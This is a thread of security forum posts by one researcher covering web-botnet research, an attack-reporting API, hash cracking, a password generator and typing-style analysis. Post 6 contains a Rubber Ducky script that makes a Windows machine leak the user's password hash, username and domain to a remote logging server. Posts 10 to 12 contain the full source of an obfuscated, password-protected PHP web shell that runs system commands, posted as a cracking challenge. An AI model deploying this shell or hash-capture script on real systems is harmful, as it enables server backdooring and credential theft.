
bwall

Active Members
  • Posts

    74
Posts posted by bwall

  1. Snort only does detection on a packet-by-packet basis (correct me if I'm wrong, it's been a while), so I don't believe Snort would work as a total solution, as different attacks can easily span more than one packet. I was thinking of writing an Apache/Nginx module that sent attack data, so at least that would handle vhosts. I'm still working on this though. Currently, I'm trying to find a good way to set up an easy-to-use SDK from various languages so attacks can be reported from plugins/IDSs/etc. I also have a few less public things as well, at least until I can get a good idea of how well they work out.

  2. Yes, as DigiP said, I have filtering methods in place and I confirm information before I merge it into a local database I'm using to conduct the research on. There is also value in gathering information on those who are trying to submit spam/erroneous information.

    If you are looking for the Attack Scanner link, it's in DigiP's signature, but in case that changes at some point, here it is: http://www.attack-scanner.com/

    If you are looking to develop an application/honeypot that will submit information to the API, feel free to contact me about implementation code in the language you are using.

  3. For the past few months (maybe even half a year now), along with DigiP, I have been researching web botnets, the attacks they use, and the common web shells they use. As a result, we have been able to release products to help protect against their spreading attacks and have released 2 exploits for taking down the botnets themselves.

    The issue we have run into is that we have a limited amount of data/honey pots to work with. While we do have some collecting data, the data being gathered is somewhat limited. This is why I started the Attack-Analysis project. This project is designed to host a web API to post general attack information to when your webserver or honey pot receives an attack. This attack data is then pumped into a database, which is later analyzed by me to come up with details on these botnets, including exploits to take them down or, in a slightly less ethical manner, take control of them.

    The details for the API are here: https://defense.ballastsecurity.net/wiki/index.php/Attack_Analysis

    Another place that you can help is with the payload decoder, which archives and decodes RFI payloads. The details for that are here: https://defense.ballastsecurity.net/wiki/index.php/RFI_Payload_Decoder

    and the results are currently hosted here along with the archived sources: https://defense.ballastsecurity.net/decoding/index.php

    The exploits:

    http://www.exploit-db.com/exploits/24883/

    http://www.exploit-db.com/exploits/20168/

    So if you want to help the good fight, please help out any way you can. I try to make everything I release as open source as possible, but some things need to stay a bit in the dark for security's sake, because I know botters follow my work.

  4. Can't really account for collisions, especially since it depends on what hashing method is employed by the web server. Also, different salts can rule out predictable collisions.

    if hash(pass1 + salt1) == hash(pass2 + salt1): hash(pass1 + salt2) != hash(pass2 + salt2)
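As an added illustration of the point above (this is example code, not from the post): a deliberately tiny hash, constructed here as the first 24 bits of SHA-256 so collisions are cheap to find, shows two strings that collide under one salt and checks whether they still collide once the salt changes.

```python
import hashlib
import itertools
import string


def toy_hash(password: str, salt: str) -> int:
    """Constructed 24-bit hash (truncated SHA-256) of salt + password.

    Narrow enough that a birthday collision appears after a few thousand
    guesses; a real password hash is far too wide for this to work."""
    digest = hashlib.sha256((salt + password).encode()).digest()
    return int.from_bytes(digest[:3], "big")


def find_collision(salt: str, max_len: int = 4):
    """Return two distinct lowercase strings whose toy hashes collide under `salt`."""
    seen = {}
    for length in range(1, max_len + 1):
        for chars in itertools.product(string.ascii_lowercase, repeat=length):
            candidate = "".join(chars)
            h = toy_hash(candidate, salt)
            if h in seen and seen[h] != candidate:
                return seen[h], candidate
            seen[h] = candidate
    return None


def collision_survives_resalting(salt1: str, salt2: str) -> bool:
    """Find a collision under salt1 and report whether it persists under salt2.

    With a different salt the two inputs hash independently again, so the
    collision survives only by chance (1 in 2**24 for this toy hash)."""
    pw1, pw2 = find_collision(salt1)
    assert toy_hash(pw1, salt1) == toy_hash(pw2, salt1)
    return toy_hash(pw1, salt2) == toy_hash(pw2, salt2)


if __name__ == "__main__":
    pair = find_collision("salt1")
    print("collision under salt1:", pair)
    print("still collides under salt2:", collision_survives_resalting("salt1", "salt2"))
```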

  5. For everyone who uses a password manager, this might be a good extension for you to try. After doing a bit of research, I found that most hash cracking software cannot crack passwords over 125 characters. While a 125-character password is extremely strong, 126 makes it so hash cracking software must be modified (which can be a pain, as I found after helping patch John the Ripper). I was sad to see that password managers don't have the option to create passwords that large (for the most part), so I decided to create a simple Chrome extension to generate passwords at a variable length, with a focus on massive passwords.

    Here's a link: https://chrome.google.com/webstore/detail/bwallhatestwits-password/gocfgmeinifgmkhjkdmfjolfmpfpfnbg

    Feel free to send any questions/comments my way.

  6. I got a Rubber Ducky for xmas, and figured I would start with a simple script before I went into encoded binaries. So as far as useful, I figured I would use a testing file I have up on my server which tricks IE into trying to connect to a fake CIFS server, sending a double salted hash of the user's password on the Windows box, along with the username and domain.

    This information is then dumped to a web readable file.

    DELAY 1000
    CONTROL ESCAPE
    DELAY 50
    STRING iexplore.exe http://firebwall.com/test.html
    ENTER
    DELAY 2000
    ALT f
    STRING x
    REM http://firebwall.com/hashlog.txt will show the exchange that you can run password cracking on

    I have a custom CIFS server up, but there is a metasploit module you can run on your own. If you do not wish to make your IP, password hash, username and domain publicly available, do not go to test.html with anything other than wget or curl.

  7. I read the topic to this and was immediately interested. I am a big fan of hunting botters. Some of them make it really easy too. The number one thing you want to do is honey pot and sandbox anything you can get your hands on from the botnet. Get as much intelligence from them as you can, because they always do thoughtless things like hardcode a password into the bots, or connect to a C&C that isn't public.

    This topic also reminded me of a video I put out through Ballast Security a little while back, about exploiting a pBot RCE to destroy a whole botnet. DigiP did the music for this one I'm pretty sure.

  8. I'm sorry, but flooders are lame, and flooders that don't use PCAP for packet crafting are even worse. Not only is your performance going to drop off a cliff after 65535 "connections" are used, it's going to drop off even more when you hit the file descriptor limit on the OS. 20 lines of Python using pcap and threads could trounce this, but it'll be a cold day in hell when you see me write a DoS tool.

    This is a prime example of an Anonymous member. So unbelievably ignorant of even the attack methods they use as their primary attack, horrible coding skills, and then he thinks he's going to get kudos for posting about DoS tools in a SECURITY thread?

  9. I never claimed to be a pwngrammer..lol

    I was just trying to bypass having to know the password and hoping that whatever I made it to be, the rest would fall in place based on what I fed it, but I guess it won't work that way with this script. I know we've done something similar like that in the past but I guess with all your pack and unpack binary stuff, it has to match exactly or it barfs, so I am at a loss other than brute forcing the password..lol

    Still, I get a syntax error for the pack-unpack stuff, but maybe that's because I don't have the proper password to make the rest of the functions and code stuff appear properly.

    Did you try using the latest code I pasted? Fixed a backwards compatibility issue.

  10. Those that find that they get the "unexpected '[' error", it is caused by syntax that requires version 5.4 or newer of php.

    Looking at the code again, I can see it will take a while to devise a way to attack this without simply replacing the code with a logger to grab the password when the attacker attempts to run a command.

    If anyone else is looking at this then as we know you can assume that $e = "system". I also believe that $e1="passthru" and $fex = "function_exists".

    I have based these assumptions on the number of characters returned from the pack function when called with the 'I', 'S' and 'C' options (4, 2 and 1 respectively), which gives us a length of 8 for the $e1 function name (passthru) and 15 for the $fex function name (function_exists).

    You are correct with those assumptions. You can also replace "I" with "L".

    Is there a backward compatible syntax for pack < 5.4? Feeling particularly lazy today >.<

    Last night I put together a script that can generate this shell with any password, but I will not be releasing it until someone solves this. I am open to help anyone looking for optimizing a cracking method.

    DigiP - You mixed that up, $_REQUEST[pack("l",1936941424)] is $_REQUEST['pass'] not 'pass'. Just a simple way to input the pass via $_GET/$_POST/$_COOKIE

    Code Update:

    <?php
    @error_reporting(0);
    $p=str_rot13("cnpx");
    if(!isset($_REQUEST[pack("L",1936941424)]))exit();
    $h=$_REQUEST[pack("L",1936941424)];
    for($i=0;$i<10000;$i++)$h=md5($h,1);
    $h=md5($h,1);$t=unpack("L",$h);$t1=unpack("S",$h);$t2=unpack("C",$h);$e=$p("L",4336671913-$t[1]).$p("S",86171-$t1[1]);
    $h=md5($h,1);$t=unpack("L",$h);$t1=unpack("S",$h);$t2=unpack("C",$h);$e1=$p("L",2317167118-$t[1]).pack("L",2350657810-$t[1]);
    $h=md5($h,1);$t=unpack("L",$h);$t1=unpack("S",$h);$t2=unpack("C",$h);$fex=$p("L",2029019048-$t[1]).$p("L",2213630902-$t[1]).$p("L",2130333601-$t[1]).$p("S",89781-$t1[1]).$p("C",181-$t2[1]);
    $h=md5($h,1);$t=unpack("L",$h);$t1=unpack("S",$h);$t2=unpack("C",$h);
    $r=$_REQUEST[$p("L",4994670222-$t[1])];
    if($fex($e)){$e($r);}
    else if($fex($e1)){$e1($r);}
    ?>

    This should fix the PHP version issue.

  11. 3 hints. If the password is wrong, errors will be thrown.

    Also, yes the password is iteratively hashed 10k times with MD5 then used to encrypt values, then is further hashed.

    For the brute force angle, assume $e = "system"

    Edit:

    I'd also like to point out a good point. I should not have used "I" for packing; "L" or "N" would have been better choices. This shell is confirmed to work on an x64 Intel® Core i7-2620M CPU. x64 and x86 should not matter in this case since only 32-bit integers are being dealt with.

    Some help with the password (brute forcing will take a LONG time without an optimized attack): the alphabet is [a-zA-Z0-9]. The idea was to make it so brute forcing would not be a viable option, even for a forensics enthusiast like me with processing power (GPU and CPU) out the ass.

  12. So I see a lot of obfuscated/encoded PHP payloads used in RFI attacks. In general though, they are trivial to decode (decoding tool I develop: https://firebwall.com/decoding/index.php). After writing 2 papers on how and why they could be developed better (http://firebwall.com/research/InsecurityofPoorlyDesignedRemoteFileInclusionPayloads-P1.pdf and http://firebwall.com/research/InsecurityofPoorlyDesignedRemoteFileInclusionPayloads-Part2.pdf, written with DigiP), and only seeing simple increases in the attempt to hide information, I decided to spend an hour and write one that was actually not only hard to decode, but hard to take control over.

    I put this challenge to the Hak5 community, tell me the password I'm using and how to run commands. I'm certain the Transferable State Attack would help you in your decryption process.

    Here is the payload: http://pastebin.com/W92Q0Q9j

    Happy Hacking :D

  13. My long envied WAF Apache module is finally available for purchase. It uses regular expression rules (user defined) against the URI being requested to determine whether the request should be dropped or not. I use this module as a cornerstone of my web server security and have various scripts built around it to bridge the gap between the web server and the firewall.

    Here is the link to the page describing the WAF: https://www.ballastsecurity.net/mod_ballastsec_waf/

    Here is a link to a sample of how to integrate it into your web server firewall: https://www.ballastsecurity.net/blog/mod_ballastsec_waf-iptables-and-ipset/

    If someone is willing to donate a server, I am willing to write a version that doesn't permanently ban rule offenders so people can get a feel for how it works and play with it a bit.

    #AnotherOneBitesTheDust

  14. I agree bobbyb, the initial PoC with basic character sequence signatures does not seem to be verbose enough. Ideally, I wanted to do matches on those because it allowed for the smallest databases, but I clearly need to expand to 3 char combos, 4 char combos, and then full words as well.

  15. If you have known me a while, you know I like to work with Markov chains to do various things. In this case, it is to match typed text to its author based on matching Markov chains. I'll do a brief overview of the concept real quick. We all tend to type things a bit differently, making distinguishable typos, saying things certain ways, even hitting random characters in a similar way. People who have been typing for a long time mostly do it based on muscle memory, which is not very different from a Markov chain.

    If we do an analysis of the sequence in which the characters are output, we can use that information in Markov chains to determine how closely it matches a person's typing style. This idea can be applied to identify who typed something out of a group of people (so it's good for confirming or denying that a profile using the same nickname as another can be matched to that nickname on more than just the name), to generate the most likely password guesses for a particular user, and even to detect whether a new user connected to a server actually matches the usual user. It has a lot of applications, but the results can be hard to decipher. That is something I am still working on. The source for this project can be found here in Python: https://github.com/bwall/markov-analysis

    I'm still working on it and trying to make input/output as widely applicable as possible.
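The idea described above, as an added example that is not the markov-analysis project's code: a first-order character Markov chain is trained per author on constructed sample text, and an unknown message is attributed to whichever author's chain gives it the highest average log-likelihood (Laplace smoothing keeps never-seen transitions from scoring as impossible).

```python
import math


class CharMarkov:
    """First-order character Markov chain capturing one author's typing habits."""

    def __init__(self, alphabet_size=128):
        self.alphabet_size = alphabet_size   # smoothing denominator (ASCII assumed)
        self.transitions = {}                # prev char -> {next char: count}
        self.totals = {}                     # prev char -> total outgoing count

    def train(self, text):
        for prev, cur in zip(text, text[1:]):
            row = self.transitions.setdefault(prev, {})
            row[cur] = row.get(cur, 0) + 1
            self.totals[prev] = self.totals.get(prev, 0) + 1

    def log_prob(self, prev, cur):
        # Laplace smoothing: an unseen transition is unlikely, not impossible
        count = self.transitions.get(prev, {}).get(cur, 0)
        return math.log((count + 1) / (self.totals.get(prev, 0) + self.alphabet_size))

    def score(self, text):
        """Mean log-likelihood per transition; higher means closer to this author."""
        pairs = list(zip(text, text[1:]))
        if not pairs:
            return float("-inf")
        return sum(self.log_prob(p, c) for p, c in pairs) / len(pairs)


def build_models(samples):
    models = {}
    for author, text in samples.items():
        models[author] = CharMarkov()
        models[author].train(text)
    return models


def attribute(text, models):
    """Return the author whose chain scores the text highest."""
    return max(models, key=lambda author: models[author].score(text))


# Constructed training text: "alice" habitually types "teh" and trails off with
# dots, "bob" writes in txt-speak. Real use needs far more text per author.
AUTHOR_SAMPLES = {
    "alice": "teh server is down again... i restarted teh service... "
             "teh logs show nothing... i think teh disk is full...",
    "bob": "thx m8 u r right, gr8 work, c u l8r, thx 4 ur help, u r awesome m8, l8r, gr8 stuff",
}
MODELS = build_models(AUTHOR_SAMPLES)

if __name__ == "__main__":
    for msg in ("teh disk is full... i restarted teh server again...", "thx m8, gr8 work, c u l8r"):
        print(repr(msg), "->", attribute(msg, MODELS))
```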

  16. Ballast Security is having another hash cracking competition, but this time it is a bit more. The rules for competition 3 are that whoever is in the lead when the hashes run out chooses the next set of challenge hashes. So any hashes they can't crack, they put the other players to the test, and everyone has access to the results from the challenges. So it's a combination of a hash cracking challenge as well as a community hash cracking project. You can find more here: https://www.ballastsecurity.net/forum/index.php/topic,6.0.html
